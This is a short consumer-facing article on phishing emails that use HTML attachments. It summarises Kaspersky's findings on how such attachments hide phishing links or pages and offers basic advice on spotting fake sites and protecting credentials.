How to avoid phishing emails
Hackers are continuously seeking new ways to evade antivirus systems, and attaching HTML documents to an email is one of the most prevalent methods.
Malicious HTML attachments hide phishing content better than email body links because they are less likely to be detected by email filters.
Popular antivirus service Kaspersky has identified two primary forms of HTML attachments used by cybercriminals: HTML files with a link to a fake website or an actual phishing page.
Using the first form of HTML attachment, an attacker can hide a link in the attached file and automatically redirect a prospective victim to a fraudulent site. In contrast, the second type of HTML attachment allows an attacker to bypass constructing a phoney website and save on hosting costs.
In the first four months of this year, Kaspersky discovered approximately 2 million emails with malicious HTML files.
Attaching phishing URLs to emails
In order to use this approach, you must move the code around in a way that makes it difficult to understand. In order to make the original code more difficult to repair, some fraudsters employ a variety of ready-made tools.
Encoding or compressing their code makes it appear smaller than it really is, which is another method of concealing phishing material in email attachments. When Kaspersky recently discovered a malicious HTML attachment containing a full-fledged phishing page encoded in a tiny, two-line script, they knew they were on to something.
How to avoid phishing emails
In order to fool unsuspecting users into handing over their personal information, phishing sites often replicate the look and feel of trustworthy websites. It’s easy to spot a fake website, even if it’s almost an exact replica of the real thing, by looking for spelling mistakes or by checking the URL in your browser’s address bar.
You should never use your email address to access a company’s login page; instead, use the company’s website or a search engine to find the login page. You’ll be sure you’re not visiting a bogus site impersonating a well-known brand or company if you do this.
Avoid opening emails from unknown senders when it comes to phishing. Cybercriminals can utilise the appearance of immediacy in their communications as a means of seducing their victims.
Anyone who receives an email from an unknown sender should not open the email or any attachments it contains. Emails typically include Word documents, PDFs, and other office files, but websites seldom come attached as HTML attachments, so you can nearly always be sure you’re receiving a phishing email if you see one in your inbox.
Due to the high frequency with which phishing attempts are made to get login credentials, it is essential that you use a password manager to keep your credentials safely and to automatically generate strong and complicated passwords for every one of your online accounts.